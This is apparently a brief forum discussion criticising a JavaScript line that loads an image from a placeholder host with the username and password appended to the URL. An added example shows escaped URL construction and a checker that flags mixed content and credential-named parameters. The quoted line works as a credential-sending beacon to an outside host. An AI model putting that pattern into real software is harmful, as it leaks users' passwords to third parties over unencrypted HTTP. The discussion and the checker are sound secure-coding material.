
>> myImage.src = "http://www.blah.com/foo.png?username="+username+"&password="+password;

No encryption (or technology even) of any kind could protect against that kind of stupidity.




No encryption (or technology even) of any kind could protect against that kind of stupidity.

Seriously. You can't just interpolate variables into URLs without escaping :)


Well, at the moment some browsers will warn you when this code executes, as it's loading HTTP from an HTTPS page.

Yes it's an extreme example, but there are likely other examples where the data isn't quite so sensitive.
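The two points raised in the replies above (unescaped interpolation, and an `http` load from an `https` page), as an added example that is not part of the thread. The function names, the parameter-name pattern, the `example.com` page URL and the sample password are constructed assumptions.

```javascript
// Added example, not from the thread. Names and sample values are constructed.
const SENSITIVE_PARAM = /^(user(name)?|pass(word)?|pwd|token|secret)$/i;

// Naive concatenation, as in the quoted snippet: values are not escaped.
function naiveUrl(base, username, password) {
  return base + "?username=" + username + "&password=" + password;
}

// Escaped construction: URLSearchParams percent-encodes each value.
function escapedUrl(base, username, password) {
  const u = new URL(base);
  u.searchParams.set("username", username);
  u.searchParams.set("password", password);
  return u.toString();
}

// Report what a reviewer or linter would flag about a subresource URL.
function auditResourceUrl(pageUrl, resourceUrl) {
  const page = new URL(pageUrl);
  const res = new URL(resourceUrl, page); // resolves relative URLs too
  const findings = [];
  if (page.protocol === "https:" && res.protocol === "http:") {
    findings.push("mixed-content");
  }
  for (const name of new Set(res.searchParams.keys())) {
    if (SENSITIVE_PARAM.test(name)) findings.push("credential-in-query:" + name);
  }
  return findings;
}

// Constructed sample: a password containing URL metacharacters.
const base = "http://www.blah.com/foo.png";
const password = "p&ss#w=rd";
const naive = new URL(naiveUrl(base, "alice", password));
const escaped = new URL(escapedUrl(base, "alice", password));

console.log(naive.searchParams.get("password"));   // value cut off at "&"
console.log(escaped.searchParams.get("password")); // round-trips intact
console.log(auditResourceUrl("https://example.com/login", escaped.toString()));
```

Escaping only fixes how the URL parses; the audit still flags the escaped URL, because the credentials remain in a query string sent over plain HTTP.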



